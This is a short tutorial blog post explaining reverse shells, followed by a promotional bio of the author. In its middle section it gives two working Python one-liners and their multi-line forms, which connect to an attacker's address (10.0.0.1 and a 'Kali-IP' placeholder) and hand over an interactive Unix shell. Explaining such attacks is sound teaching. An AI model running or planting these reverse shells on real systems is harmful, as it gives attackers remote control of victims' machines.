This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:
What is a Reverse Shell?
Here’s the definition of a Reverse Shell:
A reverse shell is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.
The reason for a reverse shell is simple: it’s often very hard for an attacker to gain access to a target machine because both the target’s machine and the in-network firewall carefully protect the user from incoming connections. Arguably, this is necessary because hackers from all over the world constantly try to force their way into your machine (if it is accessible via the Internet).
However, it’s almost impossible for the same firewalls to protect the client from outgoing connections. You can only do so by restricting the (potential) target to perform these operations. But system administrators and programmers must be able to open ports and communicate to other machines via TCP connections. This is what computers are here for after all.
A reverse shell utilizes this and reverses the standard way to get access to a target machine. Now, the target opens up the connection to the attacker so firewalls will often allow these connections assuming the owner of the target machine knows what they’re doing.
The only thing the attacker must do is to get the target to execute the code on their machine, open up a reverse shell and connect to the attacker’s machine. The attacker opens a port on their own machine and wait for the client to connect to this port.
Sources: You can read more here and here.
I found this code in a blog thread. You can run it from any computer with Python installed and visible from your current location:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
But you should never execute code that’s copy&pasted from an Internet source. What if the code removes all files from your computer?
Let’s have a look at how this code looks like as a Python multi-liner so that you can understand it better:
import socket,subprocess,os s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.0.1",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
As you see, the code opens a socket (which is an entry point for a connection), duplicates file descriptors, and calling a Linux shell. Thus, it will only run on Linux-based systems.
In this Github thread, I found another one-liner that opens a reverse shell:
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
When writing the equivalent multi-liner, the code looks more understandable:
import pty import socket,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("Kali-IP",443)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash")
It’s very similar to the above code but uses the
pty library to create the shell.
Where to Go From Here?
Enough theory. Let’s get some practice!
Coders get paid six figures and more because they can solve problems more effectively using machine intelligence and automation.
To become more successful in coding, solve more real problems for real people. That’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?
You build high-value coding skills by working on practical coding projects!
Do you want to stop learning with toy projects and focus on practical code projects that earn you money and solve real problems for people?
🚀 If your answer is YES!, consider becoming a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.
If you just want to learn about the freelancing opportunity, feel free to watch my free webinar “How to Build Your High-Income Skill Python” and learn how I grew my coding business online and how you can, too—from the comfort of your own home.
While working as a researcher in distributed systems, Dr. Christian Mayer found his love for teaching computer science students.
To help students reach higher levels of Python success, he founded the programming education website Finxter.com that has taught exponential skills to millions of coders worldwide. He’s the author of the best-selling programming books Python One-Liners (NoStarch 2020), The Art of Clean Code (NoStarch 2022), and The Book of Dash (NoStarch 2022). Chris also coauthored the Coffee Break Python series of self-published books. He’s a computer science enthusiast, freelancer, and owner of one of the top 10 largest Python blogs worldwide.
His passions are writing, reading, and coding. But his greatest passion is to serve aspiring coders through Finxter and help them to boost their skills. You can join his free email academy here.